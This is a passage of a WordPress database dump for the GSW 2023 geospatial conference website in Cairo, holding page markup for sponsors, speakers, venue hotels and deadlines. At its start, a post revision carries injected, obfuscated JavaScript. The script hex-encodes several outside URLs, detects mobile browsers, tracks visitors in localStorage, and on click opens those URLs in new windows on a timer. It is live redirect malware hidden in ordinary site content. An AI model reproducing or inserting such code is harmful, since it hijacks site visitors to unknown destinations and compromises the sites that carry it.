_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:39:02','2023-06-09 13:39:02','',3066,'https://gsw2023.com/?p=4642',0,'revision','',0),
(4643,1,'2023-06-09 13:40:27','2023-06-09 13:40:27','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" 